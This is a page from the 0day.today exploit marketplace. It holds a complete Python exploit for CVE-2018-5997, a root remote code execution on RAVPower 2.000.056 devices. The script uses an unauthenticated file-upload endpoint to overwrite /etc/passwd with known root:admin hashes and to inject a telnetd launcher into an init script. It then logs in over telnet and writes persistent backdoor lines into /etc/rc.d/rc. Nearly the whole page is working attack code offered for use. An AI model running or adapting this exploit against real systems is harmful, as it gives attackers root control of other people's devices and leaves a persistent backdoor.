0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
RAVPower 2.000.056 - Root Remote Code Execution Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
"""
# Exploit Title: RAVPower - remote root
# Date: 23/01/2018
# Exploit Authors: Daniele Linguaglossa
# Vendor Homepage: https://www.ravpower.com/
# Software Link: https://www.ravpower.com/
# Version: 2.000.056
# Tested on: OSX
# CVE : CVE-2018-5997
"""
import requests
import time
import telnetlib
PATH_PASSWD = "/etc"
FILE_PASSWD = "passwd"
PATH_VSTFUNC = "/etc/init.d"
FILE_VSTFUNC = "vstfunc"
FILE_RC = "/etc/rc.d/rc"
BACKDOOR_TERM = "export TERM=xterm"
BACKDOOR_TELNET = "/usr/sbin/telnetd &"
BASH_SHEBANG = "#!/bin/sh"
TELNETD = "/usr/sbin/telnetd -p 1111 &"
def upload(host, port, path, name, content):
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0"
path = "/upload.csp?uploadpath=%s&file=1515865637281" % path
url ="http://{0}:{1}{2}".format(host,port,path)
files = {'file' : ('%s' % name, content,'application/octet-stream')}
headers = {
"user-agent": user_agent
}
try:
requests.post(url,headers=headers,files=files)
return True
except:
return False
# root:admin
tmp_passwd = """root:$1$YBm5LfCo$5OEwLPLUu085z5EoDpQz7/:0:0:root:/data/UsbDisk1/Volume1:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
admin:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:15:0:admin:/data/UsbDisk1/Volume1:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
nobody:x:65534:65534:Nobody:/data/UsbDisk1/Volume1:/bin/sh
guest:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:512:0:guest:/data/UsbDisk1/Volume1/Share:/bin/sh-new
"""
tmp_vstfunc = """
export PATH=/bin:/sbin:/usr/bin:/usr/sbin
# A function to stop a program.
killproc() {
local base=${1##*/}
local pid=
pid=`pidof $base`
local i
if [ -n "$pid" ]; then
for i in $pid ; do
kill -KILL $i > /dev/null 2>&1
done
fi
rm -f /var/run/$base.pid
return 0
}
# A function to find the pid of a program.
pidofproc() {
local base=${1##*/}
#First try "/var/run/*.pid" files
if [ -f "/var/run/$base.pid" ]; then
local line p pid=
read line < /var/run/$base.pid
for p in $line ; do
[ -z "$p" -a -d "/proc/$p" ] && pid="$pid $p"
done
else
pid=`pidof $1 || pidof $base`
fi
if [ -n "$pid" ]; then
echo $pid
return 0
fi
return 1
}
# Check if $pid (could be plural) are running
# Return : 0 run
# 1 stop
checkpid() {
local i
for i in $* ; do
if [ -d "/proc/$i" ]; then
return 0
fi
done
return 1
}
# Check disk exist
checkdisk() {
return $?
}
# save pid and log function
savesc() {
local i=0
if [ -n "$3" ]; then
touch /var/run/$3.pid
fi
return $?
}
# A function check start of a program.
# return: 1 not exist
# 0 exist
checkonly() {
local prgname=${1##*/}
local pid=
if [ -f "/var/run/$prgname.pid" ]; then
pid=`pidof $prgname`
if [ -n "$pid" ]; then
return 0
fi
return 1
else
pid=`pidof $prgname`
if [ -n "$pid" ]; then
if sleep 1 && checkpid $pid && sleep 1 && checkpid $pid && sleep 2 && checkpid $pid ; then
return 2
fi
fi
return 2
fi
}
# A function save etc to mtd.
# return: 1 failure
# 0 success
saveetc() {
local ret=0
/usr/sbin/etc_tools t > /dev/null 2>&1
let ret=ret+$?
# ret=$[$ret + $?]
/usr/sbin/etc_tools p > /dev/null 2>&1
let ret=ret+$?
# ret=$[$ret + $?]
return $ret
}
# A function resume mtd to etc.
# return: 1 failure
# 0 success
resumeetc() {
local ret=0
/usr/sbin/etc_tools b > /dev/null 2>&1
let ret=ret+$?
# ret=$[$ret + $?]
/usr/sbin/etc_tools u > /dev/null 2>&1
let ret=ret+$?
# ret=$[$ret + $?]
return $ret
}
# Create a lock for /var/lock
AppScriptLock() {
if [ -f /var/lock/$1.pid ]; then
return 0
else
touch /var/lock/$1.pid
return 1
fi
}
# Check a lock for /var/lock
AppScriptChkLock() {
if [ -f /var/lock/$1.pid ]; then
return 1
else
return 0
fi
}
# Delete a lock for /var/lock
AppScriptUnlock() {
if [ -f /var/lock/$1.pid ]; then
rm -rf /var/lock/$1.pid
fi
return 1
}
DISKPATH="/data/UsbDisk1/Volume1/.vst/upgrade"
ETCPATH="/boot/tmp"
ETCBKPATH="/boot/tmp/etcbackup"
DISKETCFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etc.tar"
DIDKETCBKFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etcbackup.tar.gz"
ETCFILE="/boot/tmp/etc.tar"
ETCBKFILETAR="/boot/tmp/etcbackup.tar"
ETCBKFILE="/boot/tmp/etcbackup.tar.gz"
FILELIST="hostname passwd shadow samba/smbpasswd fileserv/lighttpd.user dropbox baidu"
FILELIST1="hostname"
backup_etc() {
rm $ETCBKFILETAR -rf
rm $ETCBKFILE -rf
rm $ETCBKPATH -rf
# if [ ! -e $DISKPATH ];then
# mkdir -p -m 755 $DISKPATH
# fi
if [ ! -e $ETCBKPATH ]; then
mkdir -p -m 755 $ETCBKPATH
fi
if [ -z $1 ]; then
FILELISTALL=$FILELIST
else
if [ $1 == "resume" ]; then
FILELISTALL=$FILELIST1
fi
fi
for f in $FILELISTALL
do
if [ -d /etc/$f ]; then
cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1
else
if [ "$f" == "samba/smbpasswd" ]; then
if [ ! -e $ETCBKPATH/samba ]; then
mkdir -p $ETCBKPATH/samba
fi
cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
elif [ "$f" == "fileserv/lighttpd.user" ]; then
if [ ! -e $ETCBKPATH/fileserv ]; then
mkdir -p $ETCBKPATH/fileserv
fi
cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
elif [ "$f" == "serversman/cloud.conf" ]; then
if [ ! -f /etc/$f ]; then
continue
fi
if [ ! -e $ETCBKPATH/serversman ]; then
mkdir -p $ETCBKPATH/serversman
fi
cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
else
cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1
fi
fi
done
tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1
gzip $ETCBKFILETAR
if [ -f $ETCBKFILE ]; then
cp -rf $ETCBKFILE $DIDKETCBKFILE
fi
}
backup_etc_telnet() {
rm $ETCBKFILETAR -rf
rm $ETCBKFILE -rf
rm $ETCBKPATH -rf
# if [ ! -e $DISKPATH ];then
# mkdir -p -m 755 $DISKPATH
# fi
if [ ! -e $ETCBKPATH ]; then
mkdir -p -m 755 $ETCBKPATH
fi
if [ -z $1 ]; then
FILELISTALL=$FILELIST
else
if [ $1 == "resume" ]; then
FILELISTALL=$FILELIST1
fi
fi
touch $ETCBKPATH/telnetflag
tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1
gzip $ETCBKFILETAR
if [ -f $ETCBKFILE ]; then
cp -rf $ETCBKFILE $DIDKETCBKFILE
fi
}
restore_etc() {
if [ -f $ETCBKFILE ]; then
gunzip $ETCBKFILE
tar xvf $ETCBKFILETAR -C / > /dev/null 2>&1
for f in $FILELIST
do
if [ -d /etc/$f ]; then
echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
#cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
cp -rf $ETCBKPATH/$f /etc > /dev/null 2>&1
else
if [ "$f" == "samba/smbpasswd" ]; then
echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
elif [ "$f" == "fileserv/lighttpd.user" ]; then
echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
elif [ "$f" == "serversman/cloud.conf" ]; then
if [ ! -f $ETCBKPATH/$f ]; then
continue
fi
echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
else
echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
fi
fi
done
if [ -f $ETCBKPATH/telnetflag ]; then
touch /etc/telnetflag
fi
fi
}
# A function check usb flag
# return: 0 service start
# 1 service stop
check_usb_flag() {
local ret=0
if [ -e "/proc/usbwrite" ];then
ret=`cat /proc/usbwrite`
fi
return $ret
}
###########################################################################
#
# LED operations
#
###########################################################################
led_wink_start() {
LED=`cat /proc/vsled`
if [ $LED -eq 3 ]; then
pioctl wifi 2
fi
}
led_wink_stop() {
LED=`cat /proc/vsled`
if [ $LED -eq 2 ]; then
pioctl wifi 3
fi
}
led_wink_chk() {
LED=`cat /proc/vsled`
if [ $LED -eq 2 ]; then
return 1
else
return 0
fi
}
###########################################################################
#
# Flag operation
#
###########################################################################
flagctl_get() {
if [ -e /dev/sda ]; then
trynum=0
while [ $trynum -lt 3 ]; do
retval=`/usr/sbin/flagctl disk get $1`
if [ ! -z $retval ]; then
return $retval
fi
let trynum=trynum+1
# trynum=$[$trynum+1]
sleep 1
done
fi
}
flagctl_set() {
if [ -e /dev/sda ]; then
trynum=0
while [ $trynum -lt 3 ]; do
/usr/sbin/flagctl disk set $1 $2
flagctl_get $1
if [ "$?" -eq "$2" ]; then
sync
return 1
fi
let trynum=trynum+1
# trynum=$[$trynum+1]
sleep 1
done
fi
return 0
}
###########################################################################
#
# string function
#
###########################################################################
str_func_strstr () {
if [ ${#2} -eq 0 ];then
echo "$1"
return 0
fi
case "$1" in
*$2*)
return 1
;;
*)
return 0
;;
esac
}
dev_test_host() {
nordev=`echo $1 | cut -c -3`
s_str=`ls -l /sys/block/$nordev/device`
str_func_strstr "$s_str" "host0"
if [ $? -eq 1 ]; then
return 1
fi
return 0;
}
dev_test_usb() {
nordev=`echo $1 | cut -c -3`
s_str=`ls -l /sys/block/$nordev/device`
str_func_strstr "$s_str" "usb"
if [ $? -eq 1 ]; then
return 1
fi
return 0;
}
###########################################################################
#
# Permission check functions
#
###########################################################################
# $1: device name
# $2: host/usb
# $3: if recursive, 1: enable, 0: disable
perm_change_start() {
permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2`
if [ ! -z $permpid ]; then
return 1;
else
/usr/sbin/permchange $1 $2 $3 &
fi
}
# $1: device name
# $2: if recursive, 1: enable, 0: disable
perm_chk_start() {
dev_test_host $1
if [ $? -eq 1 ]; then
perm_change_start $1 host $2
else
perm_change_start $1 usb $2
fi
}
perm_chk_stop() {
permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2`
if [ ! -z $permpid ]; then
for ppid in $permpid ; do
kill -9 $ppid > /dev/null 2>&1
done
fi
}
###########################################################################
# Time function
###########################################################################
timedate_settosys() {
if [ -e /etc/timedate ]; then
TIMESET=`cat /etc/timedate`
date -s $TIMESET
fi
}
timedate_save() {
date '+%Y.%m.%d-%H:%M:%S' > /etc/timedate
}
"""
print "RAVPower Remote root (0day) - By dzonerzy & r3dx0f\n\n"
host = raw_input("Insert Ravpower IP: ")
print "[*] Step 1 -> pwning /etc/passwd"
if not upload(host, 80,PATH_PASSWD,FILE_PASSWD,tmp_passwd):
print "[-] Filed to pwn /etc/passwd maybe fixed?"
exit(0)
print "[*] Step 2 -> pwning /etc/init.d/vstfunc"
if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+TELNETD+"\n"+tmp_vstfunc):
print "[-] Filed to pwn /etc/init.d/vstfunc maybe fixed?"
exit(0)
t = None
print "[*] Step 3 -> Try to remove or insert SD Card or just wait for something happen (something must happen!)"
while True:
try:
print "[*] Step 3-1 -> Trying to telnet..."
t = telnetlib.Telnet(host, port=1111)
break
except:
time.sleep(5)
t.read_until(": ")
t.write("root\n")
t.read_until(": ")
t.write("admin\n")
t.read_until("# ")
print "[*] Step 4 -> pwning /etc/rc.d/rc"
t.write("echo '%s' >> %s\n" % (BACKDOOR_TERM, FILE_RC))
t.read_until("# ")
t.write("echo '%s' >> %s\n" % (BACKDOOR_TELNET, FILE_RC))
t.read_until("# ")
print "[*] Step 4-1 -> pwned!"
print "[*] Step 5 -> Saving settings"
t.write("/usr/sbin/etc_tools p\n")
t.read_until("# ")
print "[*] Step 5-1 -> Done!"
print "[*] Step 6 -> Starting telnetd"
t.write("/usr/sbin/telnetd &\n")
t.read_until("# ")
print "[*] Step 6-1 -> Done!"
print "[*] Step 7 -> Killing old telnet"
t.write("ps aux |grep 1111 | awk '{print $2}' | xargs kill -9\n")
t.read_until("# ")
print "[*] Step 7-1 -> Done!"
print "[*] Step 8 -> Restoring vstfunc"
if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+tmp_vstfunc):
print "[-] Filed to pwn /etc/init.d/vstfunc fixed?"
exit(0)
print "[*] Step 8-1 -> Done!"
print "[!] PWNAGE COMPLETED! connect with root:admin"
# 0day.today [2024-11-16] #